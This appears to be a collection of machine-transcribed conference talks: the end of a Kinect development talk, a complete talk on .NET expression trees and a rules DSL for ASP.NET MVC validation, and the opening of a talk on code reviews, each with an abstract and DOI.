seriously outclassed, but they were doing, there was companies there that were taking the depth data and doing, I guess, forest analysis. Do you know what that means? A forest algorithm? Yeah, if you know what that means, great, but that's, it's a way to do image object recognition. In fact, there, we just, Martin Ewell is here. Have you seen his stuff on computer vision? That's why I asked, because he was talking about all these open source libraries. Yeah, open CV? Yeah. Right. Yeah, open CV and they had, there's a dot net version of this. So this has object recognition stuff. And, and believe it or not, this will work with low res JPEG. Like you, you don't need a lot of, a lot of stuff to recognize. So I imagine that, you know, and this is all done by PhDs and stuff that spent a lot of time doing it. And there is a dot net library for it. So, geez, I imagine you could probably do sign language recognition with this. In fact, I wonder if it hasn't been done already. Open CV and sign language recognition. Look at that sign language recognition software using C sharp. Probably don't even need the connect. Probably do with a video camera. That's pretty cool. That's not even using a connect. That's just your video camera with open CV. Yeah. Yeah, I'm just gonna take a few photos of myself. Yeah. Well, we were interviewing Martin Ewell today and, and I was downloading this thinking, yeah, I'm going to check it out. He has a, an app that he's, he wrote, put it on a Raspberry Pi with a camera and it's over the door. So he can tell when the pizza guy is delivering a pizza and it recognizes the box and the logo and it plays a song when the pizza guy is here. Like, yay, the pizza's here, whatever. Solution in search of a problem, isn't it? I have another one of those. I just got a new refrigerator from Samsung and it's got an app. So naturally I downloaded the app, right? Because it's a refrigerator and everybody's been talking about, oh, you're smart refrigerator. It's going to be so awesome. You know, you're living in the high tech world. Your refrigerator is going to be connected to the Internet and all this stuff. And I'm like, great. So I downloaded the app from my, my Google phone here, my Android phone, my Samsung Galaxy S5. It just happens to be the same brand as my refrigerator. And, and I got it all working and I swear, I spent about 45 minutes before you even realized what the app did. Right? So I get it all working and I get the fridge connected because the fridge has got a Wi-Fi thing in it, right? Great, cool. And I finally get it loaded up. It tells me the current temperature in the freezer, current temperature in the fridge. Awesome. Allows me to put it into deep freeze mode and deep fridge mode, which I guess, power freeze and power fridge, which I guess if you take like a thing of hot soup or something and put it in the fridge and go into deep whatever and it'll drop the temperature really fast so nothing warms up, you know, and it'll bring back the temperature, blah, blah, blah. Yeah, it's great. Okay, cool. I can do that for my phone, but I got to go to the fridge to put the hot stuff in there. And there's a front panel that allows me to do that. Okay? But, but I can do that for my phone. It gets better. It gets better. You can only use it on the local Wi-Fi, not connected to the Internet. So the only reason to have this app is if you're too lazy to get up and go to the fridge, you've got to have the data right there in your hand in the living room. That's the American way. Yeah. Solution in search of a problem. Any other questions? What are you guys thinking of doing with this thing? Seriously, I want to know what's on your mind in terms of real world apps. You're making games, or do you really want to make a, anybody going to make a business app with this? I've heard colleagues have used it for new money applications. Oh, yeah. Because basically they're truckers in the movement of the chess. Beautiful. Instead of having to do it on the invasion of the teacher, they project like a chess board onto a president's chess. Nice. And then they can see you go up and down and analyze the breathing. Wow, great. That's what made us a colleague. I'm actually working with a company in Nashville right now that's doing physical therapy, and they're doing dynamic movement assessment. Basically the person gets stands in front of the connect and they do squats, and it counts as they go up and down. One, two, three. And then, you know, checks out, you know, what their, how messed up their knees are or whatever when they go up and down. Yeah. So the medical world, it definitely has huge implications that they're freaking out over how amazing it is because they've done this stuff before in medicine, but they've had to, you know, put markers on the body or they've had to be in special environments where, you know, very controlled, but not anymore. $200 device. The only thing they're complaining about is the cost of the machine that's required to run it because, you know, not every laptop is powerful enough to run it. And you got to have an i7, basically, and probably a good idea to have an SSD drive, 8GB RAM. So yeah, they're looking at a desktop machine, probably $1,200. And that's like, yeah. Yeah. Do you know about any Linux support? Linux support. I don't. No, I don't know. I know that there was a port of the last, not the last SDK, but somebody did an SDK for connector windows for Linux. Yeah. Yeah. So I wouldn't be surprised if there's something. I don't know if it'll be done by Microsoft, but you know, you never know. I mean, Microsoft is living in this great world of cross-platform now, and especially Visual Studio. I'm not so sure they're crazy about Linux, but they certainly like, you know, Apple and Android stuff. Who knows? Other questions? Yeah. Time for a beer? All right. Good. Thanks a lot, guys. Oh, wait a minute. CarlFranklin.net is my blog. This is where you can download. You'll be able to download. You can download the Kinect tools. Right now, they're only available for the old SDK. But when the new one ships and I have permission, I will post everything, everything up there. Okay. So knock yourselves out. CarlFranklin.net. That's all you need to know. Okay. Thanks. I'm sorry about this. I couldn't show it to you anyway, but at least I should have known before I, you know, put it in my suitcase. Ha ha. Thank you.
|
Carl Franklin has done extensive work with the Kinect for Windows SDK v2, and now he's sharing his knowledge and code with you. He shares code to simplify Kinect development as well as GesturePak Alpha v2, which lets you record and recognize gestures in C#.
|
10.5446/50801 (DOI)
|
Okay, so does my voice work? I suppose it does. The best part is when people come in and they look at the title of the talk and then they go, oh my, and then they go somewhere else. That's excellent. Welcome to this talk on expression trees. I'm just going to show you some images. So this is me. I'm a programmer. I work for a consultancy called Kumpitas. This is our logo. So I suppose I create technical debt for a living and I have excellent coworkers that help clean it up. And in my spare time, I just want to show you this. I'm sort of this old school gamer kind of guy, so I like Pixlart. Unfortunately, Linkpad is a great tool, but it has some limitations in its viewing of images. I just want to show you this real quick. Much better, right? It's not working that well. Okay, anyway, that's not why we're here. This is not metaprogramming. This is just an animated GIF. So let's get to it. So just sort of to set contact and to provide sort of an agenda, I'm going to start by making some unsubstantiated claims about magic. That's why this wizard is here. And then I'm going to, I think, talk a little bit about code as data, as code, as data, and so forth. And then we're going to have a very short look at the expressions that you may be familiar with. And then finally, when we get through all that, we'll start to take a look at some simple expression trees. And then let's see. We have simple expression trees, and then we'll build expression trees by hand. And we'll have some naive examples of programming with expression trees. And when we've done that, we'll go on to parsing text, I suppose, to build expression trees. And when we've done that, we'll have a little evil laughter moment. And when we're done laughing, we'll take a look at a real-world example of expression trees. That real-world example is not going to be linked or aquarible or anything like that. It's going to be a different one. I suppose that the link is like the most known application, and probably the reason why expression trees are in the framework, but we're going to do something else. And then finally, if we have the time, we'll have a little bit of turtles and strange loops. Okay. But yeah. So the unsubstantiated links about magic. So this wizard here is from the Sikbi book or the Sikbi videos, even, that you should check out if you haven't. The thing is that sort of way back and underlying the computer that we use, we have the van Neumann architecture. An important part of that is the stored program principle, which is that the program lives alongside your data. This means that we can have nice things such as programs that create other programs as they're in the data, produce other programs as they're out of the data. And that's called compilers. We use them. And that's quite powerful, but we're going to start very simple, I think. So I'm just going to type some things here. It's not what I want. It's a little bit eager. Even Linkpad is eager. It's not as bad as Visual Studio with your Sharper, but it's still eager. So what's the type of this expression? This is a lambda expression, right? You've seen this before. Actually the C-sharp compiler doesn't know. That's kind of unusual. We're sort of used to seeing an expression and we can sort of deduce what type it's going to be. But the type inference of the compiler is a little bit too weak, so we sort of have to give it some clues as to what this is. So this is something that takes two integers and produces an integer as a result. Why we have that? Well, first of all, compiles. I'm going to get rid of the wizard now. We can invoke it, right? It's not called f anymore, it's called add. And then I can dump it out. That's terribly small. So that's much better. So now we have, this is sort of step one of code as data. This is binary code as data. We can take a function or a lambda expression and we can sort of pass it around this value and then we can invoke it when we want to. That's nice. We could do something else with exactly the same expression, in fact. The strings can be sort of plus together as well. This is the same expression, different type. This is why basically the C-sharp compiler gives up. This is very nice because this allows us to sort of insult two programming communities at once, right? You combine Java and script, you get JavaScript. And we know this is powerful. We've all done the link thing. This is the only link I'm going to do in this talk. Let's say I do something like this. Very nice. This is powerful. Link is great. But I'm not going to talk about link. I'm going to do something else. We're going to sort of step up the game a little bit. Another thing that I could do is have really the same thing again that I had above. Exactly the same thing. But I've given sort of a different input to the compiler as to what this is going to be. This is not going to be a funk. It's going to be an expression of a funk. And that's something else entirely. So let's just have a look at what link pad tells us that is. Actually we should sort of compare it to the other thing. We'll start with a lambda. And it says some, basically some weird stuff that's kind of hard to read. But apparently it's some sort of representation of a method. And it makes sense. That's what we use it for. This is a little bit different. So we have, we can sort of recognize the code, the source code that we had up here. And then we have some nested nodes in here. So it's a node of a lambda. And it has some parameters and a body. And you can even go into the body and see that it's a binary expression. Now binary in this context does not mean zero and one. It means something that operates on two things. It operates in this case on a right part and a left part. And that makes sense because plus operates on two things, right? X and Y. It's not entirely clear from this visualization. I mean this gives a lot of information, but it's maybe not so intuitive. So I created a different visualization of this expression tree. It sort of shows, I suppose, or at least in my opinion, a little bit better, sort of the tree-like nature, right? So it's a tree because it has, now, this would be, the ad would be sort of the root node. And you have the left and the right side. I think you could get an even better impression of that if we try something a little bit, add something else, something like this. Let's try to dump that. Actually, let's show it. So, like so. And now you can see that it actually is a tree, right? And it is a tree in the sense that these are nodes, these are sort of objects that you can look at and you can manipulate and turn around and do things with. So that's pretty cool. Let's see where have we gotten to. I think, yeah. Let's try to, I mean this is kind of cool because we get these trees that we can play with. This is an example of the compiler providing the tree for me, right? But we don't have to rely on the compiler. We can build them ourselves if we want to. So we'll try to do that. Oh, actually, let's do this. So there are these sort of, sorry, factory methods in the framework that you can use. And whenever something's in the framework, that means you're free to use it, you should use it, right? So we'll do that. So I'm going to create a parameter. I'll call it x and sort of going to represent this thing, right? So I need three of those. So y expression, z expression. And then I need, so now I have these things basically. So I need to add together the x and the y. I'm trying to reproduce this now, okay? But I'm building it by hand instead of having the compiler do it for me. So let's add the add expression. So make a binary operation. Again not zeros and ones, but things that operate on two things. So that's going to be an expression it needs. It's an expression type. One of them is add. But of course you could do something else. You could do multiply or whatever. We're going to do add. And I'm going to use the x for my left tree and the y for my right tree. And then we need the divide operation. It's another binary expression type. Divide. And then what do I want for my left tree? That's going to be the add, right? And then I need this one. So I'm almost done. Now I have the method body or the lambda body if you want. But I don't have the lambda itself. So I need to create that as well. I'm just going to give it some name. And that's going to be, let's see, how do we do this? Lambda. And I'm actually going to have to provide the type that I want it to return. Then I need to give in the body. The body is going to be another divide. And then I need the list of parameters. It's just the x and the y and the z. Okay. So now if everything went wrong and I didn't make any mistakes, I should be able to. Let's just do this here. And I'll try to see if below this text we're going to see something that's similar to what we have above. Okay. So I'm showing what the compiler gave us. And I have a text string. And then what we built ourselves. And it's broken. That's because I cannot type. So let's see. This is the divide. This is the original one. And then we have the llama text. And the same thing again. But this one we built ourselves. Okay. So now we know that we can build them ourselves. That's good, I guess. Actually, one thing that I forgot to show you is perhaps the sort of the way back. So we had the ad expression up here. And that sort of corresponds to the source code in your project. Right? So this thing is more like the compiled binary. Cool thing and sort of a vital thing in expression trees is that there is, in fact, a way to go from the source code kind of thing to the binary kind of thing. Otherwise it wouldn't be very interesting. It would be just sort of an academic exercise in building source things. What you can call compile. And when you compile, then you have sort of one of these binary things instead. So it's like stripping off this and you're left with just the funk. And then you can call it. Let's try to do that. So if everything goes okay now, I should have 25 twice, right? And yay. I can go from the source thing, which is the expression trees, to the binary thing, which is the callable lambda expression. Okay. So now, how far have we gotten in our agenda? I said that we were going to do a lambda expression, simple expression trees, build expression trees by hand. Okay. Yeah. So we've done that. Now let's see where we are. Okay. I'm going to, I haven't programmed with them yet. I'm just building them, right? So let's have an example of that. Again, flipper. In the.NET framework, there is something called an expression visitor. An expression visitor is something that will, oh, let's just do this. Just to have an expression here. This is something that will traverse this tree and allow you to do things. So you can sort of walk the tree and look at the nodes you're in and do things with them. And again, it's in the framework, so we should use it. Here is one very simple example. Now these are the naive examples of programming just to sort of show you the concepts. Now the base expression visitor has sort of like these empty variants of traversing this tree but doing nothing, right? But it just gives you access. So this is sort of implements the visitor pattern from the Gang of Four book, which has sort of gone out of favor, I think, but still a useful pattern occasionally. So it has all these methods that you can override to do particular things when you see nodes in the tree of particular kinds. So what I'm going to do is that when I see a binary expression, then I'm going to obviously return a binary expression, but I'm going to return not the original one but one that I make myself. And it's going to have the same operation. So if it's an add operation, it's still going to be an add. But there will be a twist. And the twist is that, if you see here, oh, you cannot read this, but it says that it should have the left expression and then followed by the right expression. But the twist is that we're going to do the right one first. Does this make sense? Can we sort of predict what's going to happen? Let's try it. So I'll have the flipper and then I will visit this thing, this llama. That's going to return to me now another expression that I can show. And we'll have the llama here. Sorry. And we'll have the flop here. Okay. So the llama thing has the divide and the add on the left-hand side and the x and the y. And the flop is sort of similar, but it switched all the branches. It's terribly useful, right? Just shows you that you can manipulate things. And of course, you can do things like let's get rid of these. And of course, you can always compile them and invoke them with things. So this would be the llama thing. It should have, okay, the z is going to be something low so that we get something. So maybe 10 and 14 and 2. That should be, okay, this is 24 divided by 2. It's 12, hopefully. I'm going to have to dump it out or we're not going to see anything. And we can do the same thing with a flop. But now things are sort of different, right? So the c should be something high. The other one should not. So maybe something like this. So if we divide 90 by 3, we should get 30 back. And that doesn't work. Oh, that's because I didn't. The expression visitor just returns an expression. So basically at this point, Linkpad or the C sharp compiler cannot know that this is something that could be compiled. So I need to sort of cast it back to what it actually is, which is a little bit horrible, but bear with me. Okay, much better. So this means that you can take something, one of these expression trees, mess around with it, do whatever you want, and compile it and have it run. That's pretty powerful. Right. Yeah. Oh, sorry. Yeah. Right. So the reason why I have to cast it is that the other one is because I'm not sure what it is. The other one is because the only thing that you can call the compile on is one of these lambda expressions. It has to be a lambda expression. It cannot be one of the parameter expressions or a constant expression or anything like that. There are a bunch of different nodes. The only one that supports compile is the lambda expression. So this actually is a lambda expression, but you don't know that because basically the if you look at this method in the expression visitor that we're calling, this thing, this is pretty generic, right? So this will accept an expression and produce some expression back. So this is the thing that we're calling. And there is no way for the program up here to know that it's actually going to be one of these. But I mean, if I passed in something else, maybe I would return something else. Maybe I had a visitor that didn't operate on lambda expression, just operated on somebody of a lambda expression or something like that. And I might put that in somewhere else and then build my lambda expression, right? Does that answer your question? Sort of. Okay, I just wanted to show you sort of a different kind of visitor that I had prepared beforehand. I didn't want to bore you with all the typing. So here's a different kind of, this is still an expression visitor, but it does something else. So what it does is, well, it has this visit lambda thing. And actually what it does is just visits the node body. So it skips all the parameters, it goes straight to the body. And then whenever it sees a binary expression, it's going to do some things. We'll look at that in a moment. When it sees a constant expression, it just picks out the value. Now, a constant would be something like zero or maybe a string or something like that. And the parameter is going to be one of these x and y or z or something like that. And I'm just going to pick out the name and push that onto a stack. So what happens here now in the binary operation is that whenever, I'm just going to visit all the rest of the tree first. And then I know that on the stack, I have a stack here, I have, the idea is that I have a representation of the entire, well, on the top of the stack it's going to be a representation of the entire right-hand side of the tree as a string. And on the, well, the next item is going to be a similar representation of the left-hand side. And then I'm just going to compose that to a string. And when I have done that, I'm just going to push it so that if there are sort of nested binary expression, this will sort of compose. I think it makes more sense if I show it how it works. Let's try that. So I've imported all of these things in here. So if I take something like, well, well, I have a method. I've hidden it. I've hidden some stuff in here, right? So I have a method called text that will call this string representation visitor and return string. Okay. So I can call it with this thing and just dump it to the screen. And I can do the same thing with the sort of flipped thing that I had. So now I have sort of this representation. And I can nest it further. I can make something more complicated, I suppose. But that's going sort of from this tree representation of the expression to a string. Wouldn't it be cool if we could go the other way around so we could sort of start at a string and then we build this tree structure? So let's try to do that. I have, now we're sort of starting to get a little bit into sort of the world of parsers and compilers and stuff like that. That's obviously where we're going to end up as well. So I have this thing called an arithmetic tokenizer. And that allows me to take something like, well, let's see. I'll have a llama string, just something like this. A couple of names. And I can pass this string in. And what it's going to do for me is that I have the tokenizer. I can iterate over that. So I can say, let's say, tokenizer current dump. Let's get rid of a little bit of this noise. I have these 25s up here as well. Okay, so what it's going to do is just take some string and then pick out all the tokens. So the first parenthesis is a token. This is another token. This is a token. The operation is a token, and so forth. And that's being used inside a parser that I wrote. So I have a parser for arithmetic expressions. The idea is that this parser, or we can take a look at it. Let's see. I have the parser here. This is going to take a string, and then it's going to parse. So if I see an expression that starts with a left parenthesis, then I know that I'm in one of these binary operations. So I'm going to parse a new expression. There's going to be a new expression there, so I'm going to just recurse over here. Then I know that there should be just a token, and then I'm going to parse the right-hand side, and then I'm just going to eat up the closing parenthesis. And when I'm done, I'm going to create the binary expression. Now, if it's not a start parenthesis, then it's just going to be some sort of symbol. This is very primitive. The symbol is either going to be treated as an integer, if it is, or it's going to be treated as a parameter. Right, let's try how it works. So, parser, let's see if I can have... Now, again, I'm going to have to say here what kind of expression I expect out. Otherwise, I'm not going to be able to call it. Let's try this trick again. Let's get rid of this. Okay. So what happened here? Might not be entirely obvious, actually, because we started with a string, and now I have this string again. So it's that impressive, I'm not sure. But on the way, we have this, right? So we built the expression tree first, and then we serialized it. And this means that we can do something like this, right? We can change this string, and this is going to blow up. What? Oh, it doesn't understand the operation. Let's try one that it does understand. I'm sorry, my parser is not terribly intelligent, so just going to understand these four. Okay, but so now I have the ability to parse strings and build expression trees. And of course, I can still do this. I can still do compile, and I can call it with some values like 10, 5, and 2. And it's going to display way down here. One. Amazing. This is cool, though, because now I have a parser for a very simple binary arithmetic infix thing, but I could create a different parser, right, if I wanted to. And well, I do want to. So I have a different kind of arithmetic parser that I also wrote, which accepts sort of a different kind of syntax. So let's say I wanted to add a whole bunch of numbers, and then this old syntax that I had sort of starts to get cumbersome, right? So I wanted to do like 1 plus 2, but then I, because my parser wasn't terribly intelligent, I needed to do something like this. A different way to do that would be to do something like this, right? I'm just going to say I want to plus all these numbers together. There are crazy languages in the world that write plus in this way. So let's see how this works. Now the idea is that I want to get now a representation that will allow me to add all of these numbers together. And I'm not terribly good at names. And again, I'm going to have to tell it what I'm expecting in return. Now what am I expecting in return? Well, basically here there are no parameters, right? So it just expects something that is able to return an integer. And let's try to show that now. I'm going to get rid of this and have a look at the expression. Yep. Oh, let's get it. So what this translated into is, I mean, I have to use the operations that in the.NET framework, right? And.NET framework addition is this binary operation thing. So what the prefix arithmetic parser does is sort of translate from this representation into something that the.NET framework understands and uses. And now I can obviously do compile and, well, just invoke it. There are no parameters. And write it out. I can imagine I have to boost this up again. And 21, which is hopefully the sum of all these numbers. Okay. This now might not be completely obvious to you. But at least to me, this is sort of the evil laughter moment. I cannot spell moment, unfortunately. So it's a little less impressive. The cool thing is that now we've sort of taken a look at parsing things, building things in memory, compiling them. This means that we have sort of given ourselves the ability to inject the programming language into our runtime, right? Because this is very primitive, right? This doesn't do much interesting things at all. It just adds up numbers. But you could imagine a much more sophisticated parser here and whatever language you want here. It could even be like C sharp, right? If you were like completely insane and didn't know that Roslin existed. You could put C sharp code in here and compile it and have it run and stuff like that. Okay. So at this point, I sort of want to switch gears and turn to presentation mode. So it is time to sort of, I promised you sort of real world application. So here comes the real world application. Something you could use if you wanted to. I don't know if you're familiar with ASP.net MVC model validation. There is some nodding. So the thing with model validation is that you can have a DTO in your web application and you could annotate them with things like this. It says in this case that the username is required. And the password here is also required and it has to be at least 12 characters. I'm not going to go into sort of security discussions, but whatever. The neat thing is that when you use these expressions or these annotations or other, then you have sort of automatically without doing any lifting at all, you have client side validation and service side validation of these attributes, which is pretty cool. And there are a bunch of them. And I think the number is increasing all the time. And it covers really a lot of common use cases. So they're very nice, but they are sort of also limited to what's in the box. So if the ones that are provided doesn't do it for you, then you're sort of on your own or at least sort of. Because there are two options that you could use. You could either do a remote validation, which does service side validation sort of in the regular way. And then for the client side validation, it does an Ajax call, which is then really the service side validation pretending to be client side validation. And that sort of works. And otherwise, you can create a custom attribute. And that also works. The only thing is that it's not so cool anymore, right? Because you have to create these attributes yourself and you have to create the service side validation and the client side validation. And really the only thing that you gained was that you could sort of fit it into an existing framework. And it's grunt work. So sort of the business problem or the business proposition here is, is there a generic solution to this problem? What would be the ultimate approach? Could this be solved once and for all? So we don't have to create these remote attributes or custom attributes anymore. It would be the final word on data validation in ASP.net MVC. Well, then we have to sort of look at what we have to work with. So we have this custom thing and it can accept things into as input to the attribute. But it's pretty much limited what you can put in there. It's not just about, you could not, for instance, put a lambda expression in there, something that would invoke a method on your server and that makes sense because, I mean, what would you do for client side validation then? Strings are okay. And that's like the second evil laughter moment of this talk. Because we just saw that we could put strings in there and we could put programming language in there. Then you're in a good spot, right? So the idea that I got was that we could apply expression tree magic to sort of solve this once and for all. The idea is we create a DSL for expressing rules that apply to DTOs. And those are supposed to sort of cover arbitrary constraints that you are interested in. And we're going to use a list-like syntax for that. It's what's called S expressions, which is sort of the last one we saw earlier. The choice of syntax is just that it's so easy to parse and I don't really want to write a parser because writing a parser for something complex like C sharp, that's like horrible. Writing a parser for S expressions is something that I can do and it breaks just like not that often. Now why would I want to do this? Well, there is no why. This is my sort of Yoda-like quote. Either you do it or you don't. That's the thing with programming. And the other reason is that it's magic, right? Okay, so I created this attribute, custom attribute, called MK. And the goal is to have the one validation attribute that will rule all the others and sort of make all the others obsolete. So the idea here is that this thing could annotate some property and it would say that the value of this property should be greater than the value of the property A and it should be at the same time less than the value of the property B. And this, at least to me, these sort of relative comparisons, you don't have any support for that in the built-in attributes that I'm aware of. Maybe something has come up, I don't know. And inside MK, you could have constants. So you could say it should be greater than 10 or whatever. You can read the values of other properties. We saw that here. This is the values of the properties A and B. And you can do logical comparison if it's equal, it's unequal, greater, and stuff like that. Sorry, that's the comparisons operators. The logical operators would be the and and the or. And there are also some simple functions that you might find useful. So one of those simple functions would be max. This says that whatever property has this annotation should be greater than or equal to the maximum of A and B. And this would be something that you could put on a string. This here is supposed to read that the length of the string that this property is should be 5. So the dot there sort of refers to the property itself. So I don't have to write out the full name of the property. And you can also do comparisons on date times because sometimes you work on date times. This one says that the value of this thing should be, the date should be after 31st of January 2006 and it should be before now. So now is another built-in function. Okay, how are we in time? Not too bad. So how would we build something like this? We have to support both the service side validation and the client side validation. So the idea is to create first the DSL, which has these expressions that I showed you. And then we're going to convert those into sort of my own AST abstract syntax tree, which is sort of similar to the expression trees. And then I'm going to use those to produce on the service side dot net expression trees, which are then compiled to dot net functions at runtime. I have to do the same thing in JavaScript as well. So I sort of have my own homebrewed way of doing that. These are a lot more flexible and unsafe in JavaScript. So you can sort of build things easily and it breaks easily. So it's a trade-off. But you can get sort of a similar validation function coming out of a bunch of ill-conceived JavaScript, basically. So let's take a look at that stepwise. So we start with something like this. The property should be greater than the sum of three other properties. And that's going to build an abstract syntax tree that looks something like this. So this is just basically two lists inside one another. This is how you sort of represent S expressions. So it says that I have this top-level list, which consists of the symbol greater than the dot and then another list, which is this thing. Now from that, I generate the dot net expression tree. And then I sort of have to expand these things because, as I said before, addition is a binary operation in dot net. And then for the JavaScript witness, I create this sort of JSON-AST thing that is then used to compose a validation function in JavaScript also at runtime. I don't think I'm going to have... I don't want to expose you to the JavaScript, but it sort of... It builds up a nested function, basically. So this now translates into a greater than function that takes the result of the read property function and this sort of nested plusing, which adds up A, B, and Z. Okay. It's time for a demo. I've been talking a lot and I haven't showed you anything that works yet. Let's see if it works. So here I have a completely artificial thing called stuff. This is my DTO. And I have a bunch of arbitrary rules on there. A lot of them are a medic in nature, I suppose, but I also do a little bit on strings. But let's just have a look and see if it works, how it works. So I have stuff. I don't quite remember the rules now, but it says now that I should respect the rule that it should be greater than or equal to 10 and less than or equal to 20. So 22 is not going to go so well. 15 is going to go well. Let's do 20. Oh, that should be less than A. Oh, man, I'm in trouble now. So maybe 10 is going to be good. Zero is not equal to the sum of A and B, so 25 is. And this is really complex. Let's see. It should be either the maximum of B and 5. So 5 is not going to work, 10 is going to work, and there was also the cop out. It's also going to work. And this should be greater than, oh, let's see. Let's do 5. And I'm going to try something. But now this says that this should be the length of this string should be less than the value inside here. So let's try that. Okay, so 4 is less than 5. It works out. Now what about this? Oh, this is kind of weird. It says that it should be equal to foo reversed. So it has to be this. Yay! So there is one thing, though. I'm going to see if I can trick this. Because there is now a validation rule on C that says it should be the sum of A and B, but it's not, because I didn't go into the field C, so I sort of tricked it. But once I go to update, that's just tricking JavaScript. And tricking JavaScript is easy, right? Tricking.net is not so easy. So when I hit the server, I still have to respect this constraint, right? It doesn't work. And whoa, something died. Never mind. When something dies, you go to a different demo, right? So I have a different demo here. This is now just another DTO. You can look at the DTO if you want to. Person. It has these other rules, and it has a custom error message. So you can sort of, if you don't like the sort of treating your customers to S expressions, you could give it a little bit more friendly name. So maybe I try something like this name, and that's too long. I'm going to use a different name. And this works fine. Well, it doesn't work so fine. It should be, it's kind of weird if someone is predicted to die in the future, right? So let's see if it's okay to die today. It is. Yay. Big win. And the last scene, well, it has to be between birth date or death date, because otherwise it would be scary, right? So yeah, that's a different, that's another demo. And we still have a little bit of time. Maybe we should take a quick look at the code. You want to do that? Just to sort of see where we are. Now, there is this MK attribute now, and it is in a validation attribute, and I client, I have no idea how to pronounce that, so I'm not going to try. But it takes a rule source. That's going to be the sort of weird expression thing that I'm giving it in. And then it parses that and creates a console. A console is just going to be a reference to that abstract syntax tree that I talked about. And when you sort of, when it's time to do the validation on the server side, it's going to create a validator, and then just going to call that validator directly. If it's okay, then it's okay, otherwise it's going to return a fault. And there are similar things for the client side bit. The output then is a little bit different. So you sort of traverse the same AST, but then you produce some JSON and send that to the browser. And of course, I showed you some really simple examples earlier on. Here things are a little bit more complex because we're just doing more stuff. But the principles are pretty much the same. So we still have something that builds an expression tree, and then you can recognize that it has some of these methods, and now I can see why the reverse thing failed earlier, because it's not here. But yeah, so you do a lot of things just to build this expression tree that you can compile. So at this point, I think I'm just going to skip to the last demos. Maybe you guys are ready for coffee now. I am. Let's do something. Hopefully, you've seen that there is some value to this, right? This is kind of powerful. This last thing I'm going to show you is even more powerful, but it's less useful. It's just for fun. The thing is that I implemented something called eval for the DSL. So this means that I can evaluate these things sort of in the runtime itself. So again, it's easier to show you. So now the rule is I'm going to pick out that thing and apply that as a rule to this. You can see that if I had shown you this. So it says eval rule, and this says that I'm going to take whatever you have in the rule field, and that's going to be my rule. So now the rule is it should be less than 10. And if I say 15, it's not less than 10, right? 10 is less than 10. Now, similarly, I can say it's going to be earlier than now. So let's have something that's not earlier than now. Right? Is there anything else I can do? Well, I don't know. Sorry? Oh, less than now, and you just put in something. Well, it's probably going to break. I'm not sure. Well, actually, it works. Well, it's a little bit brittle. So that's one thing. So I promised you some turtles to finish it off. Let's see. Turtle. So I have a turtle here. This is a little bit weird. This says that the me property is going to take whatever itself is and apply that to itself as a rule. And the two properties going to do exactly the same thing. And that doesn't make much sense. I suppose. But let's just try to see what that would be. It should be. Now this says that, OK, the rule is that the length of this string should be less than 10. But this text is not less than 10. Right? But it is less than 15. That works. And of course, you can do exactly the same thing over here. What sort of interesting things happen if you do this, right? Because now I'm sort of taking this string. And that says that I'm going to take this string and apply that to me. Does that make sense? What happens if you put eval me and eval into? Let's try that. Eval me. That was the evil knocking lamp. Yeah, exactly. Yes. Right, so I sort of predicted that. And you can have the same thing. But you can always shortcut it like this. Right? And then everything is good. Whenever people ask me to do something else and I've prepared, I'm terrified. Right? Well, I suppose that's the way it should be, right? Yeah. OK, so basically, I think that's all I got. I could just... Yeah, there are two things that I wanted to talk about. So first thing is that if you want to read a little bit more about this thing, it's on my blog. The code is out there. It's experimental code. But it's also available as a new get package if you find that this is exactly what your business needs. And then finally, there are these cards out there. So it would be really nice if you could all just put a green card when you leave. Unless I suck, then you put a red card. And if I bore to you, you put a yellow card. And that's it. Yep, that's all I got.
|
If the world of fantasy has taught us anything, it is that the oldest magic is the most powerful magic. In the realm of computing, no magic is more ancient than the one that arises from the duality of code and data. The ability to treat code as data and data as code is at the core of LISPs legendary meta-programming capabilities, but the idea is even older than that - it echoes the spectre of von Neumann himself! With expression trees, the enabling technology behind LINQ and the dynamic language runtime, .NET programmers have access to a beautiful programming model to control this ancient magic. In this demo-driven session, we will start with some simple examples to explain the basics of working with expression trees. However, we will quickly progress to something more useful and powerful, as we consider how to build a DSL for expressing rules to be compiled and evaluated at runtime. We will end up with a complete real-world example using data validation in an ASP.NET MVC application that would be infeasible without the capabilities offered by expression trees.
|
10.5446/50802 (DOI)
|
So, I'm just going to start because I have a lot of material to go through, and maybe almost certainly one hour is not enough. So cancel all your plans. Now, I'm just kidding. Actually this will be a pretty light talk. So, hi, everyone, and thank you for coming out to this session at this late hour of the day. So I know that you've been going to sessions all day and you're probably pretty tired. I understand that. So this talk is going to be not very technically focused. It's going to be a people talk about core reviews. Okay? So just relax and enjoy. So my name is Enrico Campidoglio. I work at a company called Treton 37, which is the Swedish spelling of 13. So 13, 37. For those of you, yes, I see some people nodding. For you geeks out there, you know that the spelling of the leaps. So I work mainly in two roles. 80% of my time is spent working as a programmer, and 20% of the time is spent being a consultant. Okay? So but I'm mostly a programmer, I would say. And today, I'd like to talk to you about core reviews, not the core review you might think of. So not the core review where you, as a consultant, are asked to buy a company, please come in and look at all our code and make a review. That's not the core reviews I'm talking about. I'm talking about the core reviews you do daily with your team members. Okay? Because why not? So core reviews. Or as I like to say, you want to merge? Let's talk about it. Okay? Not so fast, cowboy. And we're going to talk about two things, or two kinds of aspects related to core reviews. The first one, for all of you agile people, you immediately recognize this, individuals and interactions, and we are going to talk about processes and tools, or in more common language, human stuff and machine stuff. Because core reviews are mostly about people, but there are also some tools involved in that. Okay? So that's what we're going to talk about. Next, let me ask you, how many of you are doing core reviews with your team members on a regular basis? Okay. So that's about, I would say, 40%. And how to keep your hand up if you're doing it daily or on every commit. So that's about the same. I was 30%, 35. Okay, let's say 32. Is that enough? Yeah. So 30% of you are doing it on a daily basis. So the rest of you, I'm guessing, you are not doing that. So why not? Why are you guys not doing core reviews? You know, in the publishing industry, no written word ever sees the light of day until it's being reviewed by at least a dozen people, which are experts in the field where they're writing a book on or an article. Some people even have their blog posts reviewed by others before they publish them because they are afraid of the bashing, you know, just double-checking. So if you're doing this with the written words and code is written word, why are we not reviewing our code? Why are we just pushing and merging happily every day? I have a theory about that. There are a few problems with core reviews. And with most human things, it's hard to just point out what the problem is until it hits you in the face. Okay? So let's try that. Let's try to pinpoint what the problem is. The first problem I see with core reviews is ego. Now, we all know about ego. Programmers are a proud bunch. And core reviews, sometimes, they just rub programmers wrong. But we all know that ego is inversely proportional to the amount of knowledge you have. Do you think about that? The less the knowledge, the greater the ego, the greater the knowledge, the lesser the ego. So that's one aspect of it. And there is something we can do about it, which we'll talk about later. So ego. The other thing is some programmers tend to identify themselves with the code they write. As if the code they write is an extension of themselves, it's their essence. Now, that makes me think a little bit. Because think about, if you look at the code that you wrote, say, five years ago, chances are you're going to look at the code you wrote five years ago and think, 